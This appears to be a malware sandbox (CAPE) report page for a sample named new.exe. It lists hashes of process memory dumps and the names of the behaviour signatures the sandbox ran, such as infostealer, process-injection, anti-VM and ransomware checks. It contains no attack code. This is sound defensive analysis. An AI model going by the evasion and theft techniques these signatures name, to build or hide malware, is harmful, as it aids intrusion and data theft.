CAPE Yara None matched
Download Download ZIP
Process Name new.exe
PID 1332
Dump Size 264192 bytes
Module Path C:\Users\user\AppData\Local\Temp\new.exe
Type PE imageexecutable
MD5 7d931ff5efe7a53b602f3b253b79d2fe
SHA1 ed0fef2ae2146ba7b57496f4f4f3c4432c35f990
SHA256 91449944f38bb7746eb3d7c6ca0d73c1342a93391474d697ce31c2fbbc5e8f51
CRC32 11BF63FA
Ssdeep 3072:dYrClLswbDDxcNSA2ijEVAPS58c2VWWij3VA/2hhRlSPptn:d7RU2ijEVAa0ij3VAxtn
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 91449944f38bb7746eb3d7c6ca0d73c1342a93391474d697ce31c2fbbc5e8f51
Download
Process Name new.exe
PID 828
Dump Size 42496 bytes
Module Path C:\Users\user\AppData\Local\Temp\new.exe
Type PE imageexecutable
MD5 e1e57a4aeaccd7a701533a13d205d77a
SHA1 827c798314b5fcb1193772119cacab5d56642dc2
SHA256 4b8a1ee2eb4afe2b89724653ccc114586908487cd4c989db689419ae4faae329
CRC32 27BB00D9
Ssdeep 768:pEq9wK5Zp7VjMOzbrBSPsNd6lIHx95Ul:pE6nBbdSPfo5Ul
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 4b8a1ee2eb4afe2b89724653ccc114586908487cd4c989db689419ae4faae329
Download
Process Name cvtres.exe
PID 2276
Dump Size 37888 bytes
Module Path C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
Type PE image: 64-bit executable
MD5 71091372f908ff393707aee4cba5d84d
SHA1 c880904b97ed55853313440f05ae540a01648672
SHA256 4208468d04b849b286a139ace821a9148a3675d9e5550869fa7dcae645cedd5a
CRC32 4631AA47
Ssdeep 768:TIAL6slCdVd4vKZGH9hinAa8+2pDs70NlVFKdnW:Euvgg0217NRKdnW
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 4208468d04b849b286a139ace821a9148a3675d9e5550869fa7dcae645cedd5a
Download
Process Name csc.exe
PID 1096
Dump Size 90112 bytes
Module Path C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
Type PE image: 64-bit executable
MD5 d95327d490c6565e5d538820a7953b48
SHA1 00cf346af346bfc7577686bcd08055c4d9687985
SHA256 21b736c80f80035d4edc7aa7e905b4fd0ce39d34e51222a34314df9288f410de
CRC32 976E6511
Ssdeep 1536:fmVwfDKca0EkVQHMMUUf1L6NAk+yzPIX6ONxyhSTcuxxSB:/ra1kzMN1ByoguxxSB
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 21b736c80f80035d4edc7aa7e905b4fd0ce39d34e51222a34314df9288f410de
Download
Process Name powershell.exe
PID 2084
Dump Size 474624 bytes
Module Path C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe
Type PE image: 64-bit executable
MD5 433f29656a2de1b6174ba5e85e553436
SHA1 0158fd3e6c50815535459f62f899ac9b9874e321
SHA256 aa89215a5b20dc32ebcdf7803cfe51407461dd6b1a95b1838eb617e64425981a
CRC32 268B2BF1
Ssdeep 6144:LvGRyCXBgoDhzoNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qRZgQhIKXzJ4pdd3klnnWosPhnzq
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename aa89215a5b20dc32ebcdf7803cfe51407461dd6b1a95b1838eb617e64425981a
Download
Process Name explorer.exe
PID 1632
Dump Size 2871808 bytes
Module Path C:\Windows\explorer.exe
Type PE image: 64-bit executable
MD5 550b266f9a00744c304d7e56f72e0927
SHA1 60e4640ff43698060d9afd5dc8f8600244bfc585
SHA256 8b05cd269d9c70dd0f3e3e2f9153d428df34fa0ae319a319fc8b42542c0a9fc1
CRC32 DA089CFF
Ssdeep 49152:JxrceI/lIRYraisQhFCUufvYYYYYYYYYYYRYYYYYYYYYYE3iA7/eFUJN9ojoso2W:DrcPlIWmvYYYYYYYYYYYRYYYYYYYYYY4
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 8b05cd269d9c70dd0f3e3e2f9153d428df34fa0ae319a319fc8b42542c0a9fc1
Download

Comments



No comments posted

Processing ( 8.674 seconds )

  • 3.059 CAPE
  • 2.668 ProcDump
  • 1.899 BehaviorAnalysis
  • 0.541 Static
  • 0.174 Dropped
  • 0.131 TargetInfo
  • 0.091 TrID
  • 0.058 Deduplicate
  • 0.038 NetworkAnalysis
  • 0.009 Strings
  • 0.005 AnalysisInfo
  • 0.001 Debug

Signatures ( 1.327 seconds )

  • 0.485 antidbg_windows
  • 0.113 antiav_detectreg
  • 0.061 decoy_document
  • 0.059 api_spamming
  • 0.042 infostealer_ftp
  • 0.03 Doppelganging
  • 0.025 antivm_vbox_window
  • 0.025 antivm_generic_scsi
  • 0.025 infostealer_im
  • 0.023 antianalysis_detectreg
  • 0.02 antisandbox_script_timer
  • 0.018 infostealer_mail
  • 0.015 recon_programs
  • 0.015 stealth_timeout
  • 0.014 Extraction
  • 0.014 injection_createremotethread
  • 0.014 InjectionCreateRemoteThread
  • 0.013 mimics_filetime
  • 0.013 antivm_generic_disk
  • 0.013 injection_runpe
  • 0.013 antiav_detectfile
  • 0.012 antivm_vbox_keys
  • 0.011 InjectionProcessHollowing
  • 0.01 antivm_generic_services
  • 0.01 reads_self
  • 0.01 virus
  • 0.009 InjectionInterProcess
  • 0.009 bootkit
  • 0.009 antidebug_guardpages
  • 0.009 stealth_file
  • 0.009 infostealer_bitcoin
  • 0.008 exploit_heapspray
  • 0.008 antivm_vmware_keys
  • 0.008 recon_fingerprint
  • 0.006 stack_pivot
  • 0.006 kibex_behavior
  • 0.006 antivm_xen_keys
  • 0.005 antiemu_wine_func
  • 0.005 betabot_behavior
  • 0.005 infostealer_browser_password
  • 0.005 dynamic_function_loading
  • 0.005 hancitor_behavior
  • 0.005 antivm_parallels_keys
  • 0.005 antivm_vbox_files
  • 0.005 geodo_banking_trojan
  • 0.005 darkcomet_regkeys
  • 0.004 malicious_dynamic_function_loading
  • 0.004 dyre_behavior
  • 0.004 infostealer_browser
  • 0.004 persistence_autorun
  • 0.004 antivm_generic_diskreg
  • 0.004 antivm_vpc_keys
  • 0.004 ransomware_extensions
  • 0.004 ransomware_files
  • 0.003 exploit_getbasekerneladdress
  • 0.003 antivm_vbox_libs
  • 0.003 kovter_behavior
  • 0.002 rat_nanocore
  • 0.002 antiav_avast_libs
  • 0.002 Locky_behavior
  • 0.002 exploit_gethaldispatchtable
  • 0.002 shifu_behavior
  • 0.002 encrypted_ioc
  • 0.002 antianalysis_detectfile
  • 0.002 antidbg_devices
  • 0.002 antivm_hyperv_keys
  • 0.002 browser_security
  • 0.002 bypass_firewall
  • 0.001 tinba_behavior
  • 0.001 hawkeye_behavior
  • 0.001 network_tor
  • 0.001 rat_luminosity
  • 0.001 dridex_behavior
  • 0.001 injection_explorer
  • 0.001 sets_autoconfig_url
  • 0.001 antisandbox_sunbelt_libs
  • 0.001 kazybot_behavior
  • 0.001 antisandbox_sboxie_libs
  • 0.001 ipc_namedpipe
  • 0.001 exec_crash
  • 0.001 InjectionSetWindowLong
  • 0.001 vawtrak_behavior
  • 0.001 cerber_behavior
  • 0.001 antiav_bitdefender_libs
  • 0.001 cryptowall_behavior
  • 0.001 antivm_xen_keys
  • 0.001 antivm_generic_bios
  • 0.001 antivm_generic_cpu
  • 0.001 antivm_generic_system
  • 0.001 antivm_vbox_devices
  • 0.001 antivm_vmware_files
  • 0.001 bot_drive
  • 0.001 modify_proxy
  • 0.001 codelux_behavior
  • 0.001 disables_browser_warn
  • 0.001 packer_armadillo_regkey
  • 0.001 rat_pcclient

Reporting ( 0.032 seconds )

  • 0.021 CompressResults
  • 0.011 SubmitCAPE
Task ID 87741
Mongo ID 5d52fe3a399c393247a57932
Cuckoo release 1.3-CAPE
Delete